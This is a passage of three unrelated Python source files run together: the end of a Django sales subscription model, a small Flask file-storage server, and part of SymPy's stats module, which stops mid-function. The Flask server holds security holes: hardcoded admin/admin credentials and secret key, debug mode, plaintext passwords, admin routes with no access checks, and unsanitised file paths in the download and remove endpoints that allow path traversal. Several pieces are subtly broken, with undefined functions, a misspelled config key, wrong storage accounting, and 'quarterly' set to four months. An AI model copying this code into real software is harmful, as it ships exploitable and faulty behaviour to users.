p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'default_order_status')[0]
new_invoice.status = long(conf.value)
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + \
str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(
trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
# if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
# Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(
pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(
order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(
Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
class Meta:
ordering = ['product']
|
|
import os
import shutil
from sqlite3 import dbapi2 as sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
flash, render_template
from werkzeug.utils import secure_filename
from contextlib import closing
from werkzeug import utils, secure_filename
# configuration
DATABASE = '/tmp/curlyserver.db'
DEBUG = True
SECRET_KEY = 'dev key'
ROOT_USERNAME = 'admin'
ROOT_PASSWORD = 'admin'
STORAGE = '/tmp/curlyserver'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__)
app.config.from_object(__name__)
app.config.from_envvar('CURLYSERV_CONF', silent=True)
# Connection to database
def connect_db():
return sqlite3.connect(app.config['DATABASE'])
def try_login(username, password):
db = connect_db()
us = db.execute('select username from users where exists (select * from users where (username) = (?))',
[username])
if us is None:
return False
else:
ps = db.execute('select password from users where username = (?)',
[username])
ps = ps.fetchone()[0]
if ps == password:
return True
else:
return False
def get_space(username):
db = connect_db()
cur = db.cursor()
space = cur.execute('select storage from users where username = (?)', [username])
space = space.fetchone()[0]
used_space = cur.execute('select used_storage from users where username = (?)', [username])
used_space = used_space.fetchone()[0]
return (space - used_space)
def get_files(username):
files = os.listdir(os.path.join(app.config['STORAGE'], username))
if not files:
return False
else:
return files
# Check if you can upload file
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
# Main upload function
@app.route('/upload', methods=['POST'])
def upload():
username = request.form.get('username')
password = request.form.get('password')
if try_login(username, password):
file = request.files['file']
file.seek(0, os.SEEK_END)
file_length = file.tell()
if file_length <= get_space(username):
filename = secure_filename(file.filename)
file.save(os.path.join(os.path.join(app.config['STORAGE'], username), filename))
db = connect_db()
used_space = db.execute('select used_storage from users where username = (?)', [username])
used_space = used_space.fetchone()[0]
used_space = used_space + file_length
db.execute('update users set used_storage = (?) where username = (?)', [used_space, username])
db.commit()
return 'OK'
else:
return 'ME'
else:
return 'AE'
# Functions for administration purposes
@app.route('/')
def show_users():
db = connect_db()
cur = db.execute('select username, storage, used_storage from users order by id asc')
users = [dict(username=row[0], storage=row[1], used_storage=row[2]) for row in cur.fetchall()]
return render_template('show_users.html', users=users)
def change_space(username, new_value):
db = connect_db()
db.execute('update users set storage = (?) where username = (?)', [new_value, username])
@app.route('/change_space/<username>', methods=['POST'])
def change(username):
db = connect_db()
value = int(request.form['bytes'])
db.execute('update users set storage = (?) where username = (?)', [value, username])
return redirect(url_for('show_users'))
# Administrator login function
@app.route('/root_login', methods=['GET', 'POST'])
def root_login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['ROOT_USERNAME']:
error = 'Invalid username'
elif request.form['password'] != app.config['ROOT_PASSWORD']:
error = 'Invalid password'
else:
session['logged_in'] = True
flash('You were logged in as admin')
return redirect(url_for('show_users'))
return render_template('login.html', error=error)
# Administrator logout function
@app.route('/root_logout')
def root_logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('show_users'))
# Add new user through the form
@app.route('/add_user', methods=['POST'])
def add_user():
uname = request.form['username']
db = connect_db()
try:
db.execute('insert into users (username, password) values (?, ?)',
[uname, request.form['password']])
db.commit()
os.mkdir(os.path.join(app.config['STORAGE'], uname))
return redirect(url_for('show_users'))
except sqlite3.IntegrityError:
flash('This username already exists')
return redirect(url_for('show_users'))
@app.route('/show_files', methods=['POST'])
def show_files():
us = request.form['user']
if not get_files(us):
return render_template('show_files.html', [])
else:
return render_template('show_files.html', get_files(us))
# Remove existing user
@app.route('/remove_user', methods=['POST'])
def remove_user():
uname = request.form['username']
db = connect_db()
db.execute('delete from users where (username) = (?)', uname)
db.commit()
shutil.rmtree(os.path.join(app.config['STORAGE'], uname))
return redirect(url_for('show_users'))
# Main login function
@app.route('/login', methods=['GET', 'POST'])
def login():
username = request.json.get('username')
password = request.json.get('password')
db = get_db()
if root_login(username, password):
session['logged_in'] = True
session['username'] = username
return 'Logged in as administrator'
else:
us = db.execute('select username from users where exists (select * from users where (username) = (?))',
[username])
us = us.fetchone()
if us is None:
return 'Wrong username'
else:
db = db.cursor()
ps = db.execute('select password from users where username = (?)',
[username])
ps = ps.fetchone()[0]
if ps == password:
session['logged_in'] = True
session['username'] = username
return 'Logged in as user'
else:
return 'Wrong password'
@app.route('/logout')
def logout():
session.pop('logged_in', None)
session.pop('username', None)
return True
@app.route('/register', methods = ['POST'])
def register():
username = request.json.get('username')
password = request.json.get('password')
db = connect_db()
try:
db.execute('insert into users (username, password) values (?, ?)', [username, password])
db.commit()
os.mkdir(os.path.join(app.config['STORAGES'], username))
except sqlite3.IntegrityError:
return 'Username already exists'
return 'Registration is successful'
@app.route('/logged_in')
def logged_in():
if session['logged_in']:
return 'Yes'
else:
return 'No'
# interfaces for contacting with client
# Sign in
@app.route('/signin', methods=['POST'])
def Nsignin():
username = request.json.get('username')
password = request.json.get('password')
db = connect_db()
if try_login(username, password):
return True
else:
return False
# Get list of files
@app.route('/listoffiles', methods=['GET', 'POST'])
def Nlistoffiles():
username = request.json.get('username')
password = request.json.get('password')
if try_login(username, password):
if get_files(username) == []:
return 'No files'
else:
l = get_files(username)
for a in l:
print a
return 'List of all files is above.'
@app.route('/download', methods=['POST'])
def Ndownload():
username = request.args.get('username')
password = request.args.get('password')
file = request.args.get('file')
if try_login(username, password):
return send_from_directory(os.path.join(app.config['STORAGE'], username), file)
else:
return 'AE'
@app.route('/remove', methods=['POST'])
def Nremove():
username = request.form.get('username')
password = request.form.get('password')
filename = request.form.get('filename')
db = connect_db()
path = os.path.join(app.config['STORAGE'], username)
path = os.path.join(path, filename)
filesize = os.stat(path)
filesize = filesize.st_size
if try_login(username, password):
if os.path.exists(path):
os.remove(path)
used_space = db.execute('select used_storage from users where username = (?)', [username])
used_space = used_space.fetchone()[0]
used_space = used_space + filesize
db.execute('update users set used_storage = (?) where username = (?)', [filesize, username])
db.commit()
return 'No such file'
return 'Login is incorrect'
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
|
"""
Main Random Variables Module
Defines abstract random variable type.
Contains interfaces for probability space object (PSpace) as well as standard
operators, P, E, sample, density, where
See Also
========
sympy.stats.crv
sympy.stats.frv
sympy.stats.rv_interface
"""
from __future__ import print_function, division
from sympy import (Basic, S, Expr, Symbol, Tuple, And, Add, Eq, lambdify,
sympify, Equality, solve, Lambda, DiracDelta)
from sympy.core.compatibility import reduce
from sympy.sets.sets import FiniteSet, ProductSet
from sympy.abc import x
class RandomDomain(Basic):
"""
Represents a set of variables and the values which they can take
See Also
========
sympy.stats.crv.ContinuousDomain
sympy.stats.frv.FiniteDomain
"""
is_ProductDomain = False
is_Finite = False
is_Continuous = False
def __new__(cls, symbols, *args):
symbols = FiniteSet(*symbols)
return Basic.__new__(cls, symbols, *args)
@property
def symbols(self):
return self.args[0]
@property
def set(self):
return self.args[1]
def __contains__(self, other):
raise NotImplementedError()
def integrate(self, expr):
raise NotImplementedError()
class SingleDomain(RandomDomain):
"""
A single variable and its domain
See Also
========
sympy.stats.crv.SingleContinuousDomain
sympy.stats.frv.SingleFiniteDomain
"""
def __new__(cls, symbol, set):
assert symbol.is_Symbol
return Basic.__new__(cls, symbol, set)
@property
def symbol(self):
return self.args[0]
@property
def symbols(self):
return FiniteSet(self.symbol)
def __contains__(self, other):
if len(other) != 1:
return False
sym, val = tuple(other)[0]
return self.symbol == sym and val in self.set
class ConditionalDomain(RandomDomain):
"""
A RandomDomain with an attached condition
See Also
========
sympy.stats.crv.ConditionalContinuousDomain
sympy.stats.frv.ConditionalFiniteDomain
"""
def __new__(cls, fulldomain, condition):
condition = condition.xreplace(dict((rs, rs.symbol)
for rs in random_symbols(condition)))
return Basic.__new__(cls, fulldomain, condition)
@property
def symbols(self):
return self.fulldomain.symbols
@property
def fulldomain(self):
return self.args[0]
@property
def condition(self):
return self.args[1]
@property
def set(self):
raise NotImplementedError("Set of Conditional Domain not Implemented")
def as_boolean(self):
return And(self.fulldomain.as_boolean(), self.condition)
class PSpace(Basic):
"""
A Probability Space
Probability Spaces encode processes that equal different values
probabalistically. These underly Random Symbols which occur in SymPy
expressions and contain the mechanics to evaluate statistical statements.
See Also
========
sympy.stats.crv.ContinuousPSpace
sympy.stats.frv.FinitePSpace
"""
is_Finite = None
is_Continuous = None
is_real = None
@property
def domain(self):
return self.args[0]
@property
def density(self):
return self.args[1]
@property
def values(self):
return frozenset(RandomSymbol(self, sym) for sym in self.domain.symbols)
@property
def symbols(self):
return self.domain.symbols
def where(self, condition):
raise NotImplementedError()
def compute_density(self, expr):
raise NotImplementedError()
def sample(self):
raise NotImplementedError()
def probability(self, condition):
raise NotImplementedError()
def integrate(self, expr):
raise NotImplementedError()
class SinglePSpace(PSpace):
"""
Represents the probabilities of a set of random events that can be
attributed to a single variable/symbol.
"""
def __new__(cls, s, distribution):
if isinstance(s, str):
s = Symbol(s)
if not isinstance(s, Symbol):
raise TypeError("s should have been string or Symbol")
return Basic.__new__(cls, s, distribution)
@property
def value(self):
return RandomSymbol(self, self.symbol)
@property
def symbol(self):
return self.args[0]
@property
def distribution(self):
return self.args[1]
@property
def pdf(self):
return self.distribution.pdf(self.symbol)
class RandomSymbol(Expr):
"""
Random Symbols represent ProbabilitySpaces in SymPy Expressions
In principle they can take on any value that their symbol can take on
within the associated PSpace with probability determined by the PSpace
Density.
Random Symbols contain pspace and symbol properties.
The pspace property points to the represented Probability Space
The symbol is a standard SymPy Symbol that is used in that probability space
for example in defining a density.
You can form normal SymPy expressions using RandomSymbols and operate on
those expressions with the Functions
E - Expectation of a random expression
P - Probability of a condition
density - Probability Density of an expression
given - A new random expression (with new random symbols) given a condition
An object of the RandomSymbol type should almost never be created by the
user. They tend to be created instead by the PSpace class's value method.
Traditionally a user doesn't even do this but instead calls one of the
convenience functions Normal, Exponential, Coin, Die, FiniteRV, etc....
"""
def __new__(cls, pspace, symbol):
if not isinstance(symbol, Symbol):
raise TypeError("symbol should be of type Symbol")
if not isinstance(pspace, PSpace):
raise TypeError("pspace variable should be of type PSpace")
return Basic.__new__(cls, pspace, symbol)
is_bounded = True
is_finite = True
is_Symbol = True
is_Atom = True
_diff_wrt = True
pspace = property(lambda self: self.args[0])
symbol = property(lambda self: self.args[1])
name = property(lambda self: self.symbol.name)
is_positive = property(lambda self: self.symbol.is_positive)
is_integer = property(lambda self: self.symbol.is_integer)
is_real = property(lambda self: self.symbol.is_real or self.pspace.is_real)
@property
def is_commutative(self):
return self.symbol.is_commutative
def _hashable_content(self):
return self.pspace, self.symbol
@property
def free_symbols(self):
return set([self])
class ProductPSpace(PSpace):
"""
A probability space resulting from the merger of two independent probability
spaces.
Often created using the function, pspace
"""
def __new__(cls, *spaces):
rs_space_dict = {}
for space in spaces:
for value in space.values:
rs_space_dict[value] = space
symbols = FiniteSet(val.symbol for val in rs_space_dict.keys())
# Overlapping symbols
if len(symbols) < sum(len(space.symbols) for space in spaces):
raise ValueError("Overlapping Random Variables")
if all(space.is_Finite for space in spaces):
from sympy.stats.frv import ProductFinitePSpace
cls = ProductFinitePSpace
if all(space.is_Continuous for space in spaces):
from sympy.stats.crv import ProductContinuousPSpace
cls = ProductContinuousPSpace
obj = Basic.__new__(cls, *FiniteSet(*spaces))
return obj
@property
def rs_space_dict(self):
d = {}
for space in self.spaces:
for value in space.values:
d[value] = space
return d
@property
def symbols(self):
return FiniteSet(val.symbol for val in self.rs_space_dict.keys())
@property
def spaces(self):
return FiniteSet(*self.args)
@property
def values(self):
return sumsets(space.values for space in self.spaces)
def integrate(self, expr, rvs=None, **kwargs):
rvs = rvs or self.values
rvs = frozenset(rvs)
for space in self.spaces:
expr = space.integrate(expr, rvs & space.values, **kwargs)
return expr
@property
def domain(self):
return ProductDomain(*[space.domain for space in self.spaces])
@property
def density(self):
raise NotImplementedError("Density not available for ProductSpaces")
def sample(self):
return dict([(k, v) for space in self.spaces
for k, v in space.sample().items()])
class ProductDomain(RandomDomain):
"""
A domain resulting from the merger of two independent domains
See Also
========
sympy.stats.crv.ProductContinuousDomain
sympy.stats.frv.ProductFiniteDomain
"""
is_ProductDomain = True
def __new__(cls, *domains):
symbols = sumsets([domain.symbols for domain in domains])
# Flatten any product of products
domains2 = []
for domain in domains:
if not domain.is_ProductDomain:
domains2.append(domain)
else:
domains2.extend(domain.domains)
domains2 = FiniteSet(domains2)
if all(domain.is_Finite for domain in domains2):
from sympy.stats.frv import ProductFiniteDomain
cls = ProductFiniteDomain
if all(domain.is_Continuous for domain in domains2):
from sympy.stats.crv import ProductContinuousDomain
cls = ProductContinuousDomain
return Basic.__new__(cls, *domains2)
@property
def sym_domain_dict(self):
return dict((symbol, domain) for domain in self.domains
for symbol in domain.symbols)
@property
def symbols(self):
return FiniteSet(sym for domain in self.domains
for sym in domain.symbols)
@property
def domains(self):
return self.args
@property
def set(self):
return ProductSet(domain.set for domain in self.domains)
def __contains__(self, other):
# Split event into each subdomain
for domain in self.domains:
# Collect the parts of this event which associate to this domain
elem = frozenset([item for item in other
if item[0] in domain.symbols])
# Test this sub-event
if elem not in domain:
return False
# All subevents passed
return True
def as_boolean(self):
return And(*[domain.as_boolean() for domain in self.domains])
def random_symbols(expr):
"""
Returns all RandomSymbols within a SymPy Expression.
"""
try:
return list(expr.atoms(RandomSymbol))
except AttributeError:
return []
def pspace(expr):
"""
Returns the underlying Probability Space of a random expression.
For internal use.
Examples
========
>>> from sympy.stats import pspace, Normal
>>> from sympy.stats.rv import ProductPSpace
>>> X = Normal('X', 0, 1)
>>> pspace(2*X + 1) == X.pspace
True
"""
rvs = random_symbols(expr)
if not rvs:
return None
# If only one space present
if all(rv.pspace == rvs[0].pspace for rv in rvs):
return rvs[0].pspace
# Otherwise make a product space
return ProductPSpace(*[rv.pspace for rv in rvs])
def sumsets(sets):
"""
Union of sets
"""
return reduce(frozenset.union, sets, frozenset())
def rs_swap(a, b):
"""
Build a dictionary to swap RandomSymbols based on their underlying symbol.
i.e.
if ``X = ('x', pspace1)``
and ``Y = ('x', pspace2)``
then ``X`` and ``Y`` match and the key, value pair
``{X:Y}`` will appear in the result
Inputs: collections a and b of random variables which share common symbols
Output: dict mapping RVs in a to RVs in b
"""
d = {}
for rsa in a:
d[rsa] = [rsb for rsb in b if rsa.symbol == rsb.symbol][0]
return d
def given(expr, condition=None, **kwargs):
""" Conditional Random Expression
From a random expression and a condition on that expression creates a new
probability space from the condition and returns the same expression on that
conditional probability space.
Examples
========
>>> from sympy.stats import given, density, Die
>>> X = Die('X', 6)
>>> Y = given(X, X>3)
>>> density(Y).dict
{4: 1/3, 5: 1/3, 6: 1/3}
Following convention, if the condition is a random symbol then that symbol
is considered fixed.
>>> from sympy.stats import Normal
>>> from sympy import pprint
>>> from sympy.abc import z
>>> X = Normal('X', 0, 1)
>>> Y = Normal('Y', 0, 1)
>>> pprint(density(X + Y, Y)(z), use_unicode=False)
2
-(-Y + z)
-----------
___ 2
\/ 2 *e
------------------
____
2*\/ pi
"""
if not random_symbols(condition) or pspace_independent(expr, condition):
return expr
if isinstance(condition, RandomSymbol):
condition = Eq(condition, condition.symbol)
condsymbols = random_symbols(condition)
if (isinstance(condition, Equality) and len(condsymbols) == 1 and
not isinstance(pspace(expr).domain, ConditionalDomain)):
rv = tuple(condsymbols)[0]
results = solve(condition, rv)
return sum(expr.subs(rv, res) for res in results)
# Get full probability space of both the expression and the condition
fullspace = pspace(Tuple(expr, condition))
# Build new space given the condition
space = fullspace.conditional_space(condition, **kwargs)
# Dictionary to swap out RandomSymbols in expr with new RandomSymbols
# That point to the new conditional space
swapdict = rs_swap(fullspace.values, space.values)
# Swap random variables in the expression
expr = expr.xreplace(swapdict)
return expr
def expectation(expr, condition=None, numsamples=None, evaluate=True, **kwargs):
"""
Returns the expected value of a random expression
Parameters
==========
expr : Expr containing RandomSymbols
The expression of which you want to compute the expectation value
given : Expr containing RandomSymbols
A conditional expression. E(X, X>0) is expectation of X given X > 0
numsamples : int
Enables sampling and approximates the expectation with this many samples
evalf : Bool (defaults to True)
If sampling return a number rather than a complex expression
evaluate : Bool (defaults to True)
In case of continuous systems return unevaluated integral
Examples
========
>>> from sympy.stats import E, Die
>>> X = Die('X', 6)
>>> E(X)
7/2
>>> E(2*X + 1)
8
>>> E(X, X>3) # Expectation of X given that it is above 3
5
"""
if not random_symbols(expr): # expr isn't random?
return expr
if numsamples: # Computing by monte carlo sampling?
return sampling_E(expr, condition, numsamples=numsamples)
# Create new expr and recompute E
if condition is not None: # If there is a condition
return expectation(given(expr, condition), evaluate=evaluate)
# A few known statements for efficiency
if expr.is_Add: # We know that E is Linear
return Add(*[expectation(arg, evaluate=evaluate)
for arg in expr.args])
# Otherwise case is simple, pass work off to the ProbabilitySpace
result = pspace(expr).integrate(expr)
if evaluate and hasattr(result, 'doit'):
return result.doit(**kwargs)
else:
return result
def probability(condition, given_condition=None, numsamples=None,
evaluate=True, **kwargs):
"""
Probability that a condition is true, optionally given a second condition
Parameters
==========
expr : Relational containing RandomSymbols
The condition of which you want to compute the probability
given_condition : Relational containing RandomSymbols
A conditional expression. P(X>1, X>0) is expectation of X>1 given X>0
numsamples : int
Enables sampling and approximates the probability with this many samples
evalf : Bool (defaults to True)
If sampling return a number rather than a complex expression
evaluate : Bool (defaults to True)
In case of continuous systems return unevaluated integral
Examples
========
>>> from sympy.stats import P, Die
>>> from sympy import Eq
>>> X, Y = Die('X', 6), Die('Y', 6)
>>> P(X>3)
1/2
>>> P(Eq(X, 5), X>2) # Probability that X == 5 given that X > 2
1/4
>>> P(X>Y)
5/12
"""
if numsamples:
return sampling_P(condition, given_condition, numsamples=numsamples,
**kwargs)
if given_condition is not None: # If there is a condition
# Recompute on new conditional expr
return probability(given(condition, given_condition, **kwargs), **kwargs)
# Otherwise pass work off to the ProbabilitySpace
result = pspace(condition).probability(condition, **kwargs)
if evaluate and hasattr(result, 'doit'):
return result.doit()
else:
return result
class Density(Basic):
expr = property(lambda self: self.args[0])
@property
def condition(self):
if len(self.args) > 1:
return self.args[1]
else:
return None
def doit(self, evaluate=True, **kwargs):
expr, condition = self.expr, self.condition
if condition is not None:
# Recompute on new conditional expr
expr = given(expr, condition, **kwargs)
if not random_symbols(expr):
return Lambda(x, DiracDelta(x - expr))
if (isinstance(expr, RandomSymbol) and
hasattr(expr.pspace, 'distribution') and
isinstance(pspace(expr), SinglePSpace)):
return expr.pspace.distribution
result = pspace(expr).compute_density(expr, **kwargs)
if evaluate and hasattr(result, 'doit'):
return result.doit()
else:
return result
def density(expr, condition=None, evaluate=True, numsamples=None, **kwargs):
"""
Probability density of a random expression, optionally given a second
condition.
This density will take on different forms for different types of
probability spaces. Discrete variables produce Dicts. Continuous
variables produce Lambdas.
Parameters
==========
expr : Expr containing RandomSymbols
The expression of which you want to compute the density value
condition : Relational containing RandomSymbols
A conditional expression. density(X>1, X>0) is density of X>1 given X>0
numsamples : int
Enables sampling and approximates the density with this many samples
Examples
========
>>> from sympy.stats import density, Die, Normal
>>> from sympy import Symbol
>>> x = Symbol('x')
>>> D = Die('D', 6)
>>> X = Normal(x, 0, 1)
>>> density(D).dict
{1: 1/6, 2: 1/6, 3: 1/6, 4: 1/6, 5: 1/6, 6: 1/6}
>>> density(2*D).dict
{2: 1/6, 4: 1/6, 6: 1/6, 8: 1/6, 10: 1/6, 12: 1/6}
>>> density(X)(x)
sqrt(2)*exp(-x**2/2)/(2*sqrt(pi))
"""
if numsamples:
return sampling_density(expr, condition, numsamples=numsamples,
**kwargs)
return Density(expr, condition).doit(evaluate=evaluate, **kwargs)
def cdf(expr, condition=None, evaluate=True, **kwargs):
"""
Cumulative Distribution Function of a random expression.
optionally given a second condition
This density will take on different forms for different types of
probability spaces.
Discrete variables produce Dicts.
Continuous variables produce Lambdas.
Examples
========
>>> from sympy.stats import density, Die, Normal, cdf
>>> from sympy import Symbol
>>> D = Die('D', 6)
>>> X = Normal('X', 0, 1)
>>> density(D).dict
{1: 1/6, 2: 1/6, 3: 1/6, 4: 1/6, 5: 1/6, 6: 1/6}
>>> cdf(D)
{1: 1/6, 2: 1/3, 3: 1/2, 4: 2/3, 5: 5/6, 6: 1}
>>> cdf(3*D, D>2)
{9: 1/4, 12: 1/2, 15: 3/4, 18: 1}
>>> cdf(X)
Lambda(_z, erf(sqrt(2)*_z/2)/2 + 1/2)
"""
if condition is not None: # If there is a condition
# Recompute on new conditional expr
return cdf(given(expr, condition, **kwargs), **kwargs)
# Otherwise pass work off to the ProbabilitySpace
result = pspace(expr).compute_cdf(expr, **kwargs)
if evaluate and hasattr(result, 'doit'):
return result.doit()
else:
return result
def where(condition, given_condition=None, **kwargs):
"""
Returns the domain where a condition is True.
Examples
========
>>> from sympy.stats import where, Die, Normal
>>> from sympy import symbols, And
>>> D1, D2 = Die('a', 6), Die('b', 6)
>>> a, b = D1.symbol, D2.symbol
>>> X = Normal('x', 0, 1)
>>> where(X**2<1)
Domain: And(-1 < x, x < 1)
>>> where(X**2<1).set
(-1, 1)
>>> where(And(D1<=D2 , D2<3))
Domain: Or(And(a == 1, b == 1), And(a == 1, b == 2), And(a == 2, b == 2))
"""
if given_condition is not None: # If there is a condition
# Recompute on new conditional expr
return where(given(condition, given_condition, **kwargs), **kwargs)
# Otherwise pass work off to the ProbabilitySpace
return pspace(condition).where(condition, **kwargs)
def sample(expr, condition=None, **kwargs):
"""
A realization of the random expression
Examples
========
>>> from sympy.stats import Die, sample
>>> X, Y, Z = Die('X', 6), Die('Y', 6), Die('Z', 6)
>>> die_roll = sample(X + Y + Z) # A random realization of three dice
"""
return next(sample_iter(expr, condition, numsamples=1))
def sample_iter(expr, condition=None, numsamples=S.Infinity, **kwargs):
"""
Returns an iterator of realizations from the expression given a condition
expr: Random expression to be realized
condition: A conditional expression (optional)
numsamples: Length of the iterator (defaults to infinity)
Examples
========
>>> from sympy.stats import Normal, sample_iter
>>> X = Normal('X', 0, 1)
>>> expr = X*X + 3
>>> iterator = sample_iter(expr, numsamples=3)
>>> list(iterator) # doctest: +SKIP
[12, 4, 7]
See Also
========
Sample
sampling_P
sampling_E
sample_iter_lambdify
sample_iter_subs
"""
# lambdify is much faster but not as robust
try:
return sample_iter_lambdify(expr, condition, numsamples, **kwargs)
# use subs when lambdify fails
except TypeError:
return sample_iter_subs(expr, condition, numsamples, **kwargs)
def sample_iter_lambdify(expr, condition=None, numsamples=S.Infinity, **kwargs):
"""
See sample_iter
Uses lambdify for computation. This is fast but does not always work.
"""
if condition:
ps = pspace(Tuple(expr, condition))
else:
ps = pspace(expr)
rvs = list(ps.values)
fn = lambdify(rvs, expr, **kwargs)
if condition:
given_fn = lambdify(rvs, condition, **kwargs)
# Check that lambdify can handle the expression
# Some operations like Sum can prove difficult
try:
d = ps.sample() # a dictionary that maps RVs to values
args = [d[rv] for rv in rvs]
fn(*args)
if condition:
given_fn(*args)
except:
raise TypeError("Expr/condition too complex for lambdify")
def return_generator():
count = 0
while count < numsamples:
d = ps.sample() # a dictionary that maps RVs to values
args = [d[rv] for rv in rvs]
if condition: # Check that these values satisfy the condition
gd = given_fn(*args)
if gd != True and gd != False:
raise ValueError(
"Conditions must not contain free symbols")
if not gd: # If the values don't satisfy then try again
continue
yield fn(*args)
count += 1
return return_generator()
def sample_iter_subs(expr, condition=None, numsamples=S.Infinity, **kwargs):
"""
See sample_iter
Uses subs for computation. This is slow but almost always works.
"""
if condition is not None:
ps = pspace(Tuple(expr, condition))
else:
ps = pspace(expr)
count = 0
while count < numsamples:
d = ps.sample() # a dictionary that maps RVs to values
if condition is not None: # Check that these values satisfy the condition
gd = condition.xreplace(d)
if gd != True and gd != False:
raise ValueError("Conditions must not contain free symbols")
if not gd: # If the values don't satisfy then try again
continue
yield expr.xreplace(d)
count += 1
def sampling_P(condition, given_condition=None, numsamples=1,
evalf=True, **kwargs):
"""
Sampling version of P
See Also
========
P
sampling_E
sampling_density
"""
count_true = 0
count_false = 0
samples = sample_iter(condition, given_condition,
numsamples=numsamples, **kwargs)
for x in samples:
if x != True and x != False:
raise ValueError("Conditions must not contain free symbols")
if x:
count_true += 1
else:
count_false += 1
result = S(count_true) / numsamples
if evalf:
return result.evalf()
else:
return result
def sampling_E(expr, given_condition=None, numsamples=1,
evalf=True, **kwargs):
"""
Sampling version of E
See Also
========
P
sampling_P
sampling_density
"""
samples = sample_iter(expr, given_condition,
numsamples=numsamples, **kwargs)
result = Add(*list(samples)) / numsamples
if evalf:
return result.evalf()
else:
return result
def sampling_density(expr, given_condition=None, numsamples=1, **kwargs):
"""
Sampling version of density
See Also
========
density
sampling_P
sampling_E
"""
results = {}
for result in sample_iter(expr, given_condition,
numsamples=numsamples, **kwargs):
results[result] = results.get(result, 0) + 1
return results
def dependent(a, b):
"""
Dependence of two random expressions
Two expressions are independent if knowledge of one does not change
computations on the other.
Examples
========
>>> from sympy.stats import Normal, dependent, given
>>> from sympy import Tuple, Eq
>>> X, Y = Normal('X', 0, 1), Normal('Y', 0, 1)
>>> dependent(X, Y)
False
>>> dependent(2*X + Y, -Y)
True
>>> X, Y = given(Tuple(X, Y), Eq(X + Y, 3))
>>> dependent(X, Y)
True
See Also
========
independent
"""
if pspace_independent(a, b):
return False
z = Symbol('z', real=True)
# Dependent if density is unchanged when one is given information about
# the other
return (density(a, Eq(b, z)) != density(a) or
density(b, Eq(a, z)) != density(b))
def independent(a, b):
"""
Independence of two random expressions
Two expressions are independent if knowledge of one does not change
computations on the other.
Examples
========
>>> from sympy.stats import Normal, independent, given
>>> from sympy import Tuple, Eq
>>> X, Y = Normal('X', 0, 1), Normal('Y', 0, 1)
>>> independent(X, Y)
True
>>> independent(2*X + Y, -Y)
False
>>> X, Y = given(Tuple(X, Y), Eq(X + Y, 3))
>>> independent(X, Y)
False
See Also
========
dependent
"""
return not dependent(a, b)
def pspace_independent(a, b):
"""
Tests for independence between a and b by checking if their PSpaces have
overlapping symbols. This is a sufficient but not necessary condition for
independence and is intended to be used internally.
Notes
=====
pspace_independent(a, b) implies independent(a, b)
independent(a, b) does not imply pspace_independent(a, b)
"""
a_symbols = pspace(b).symbols
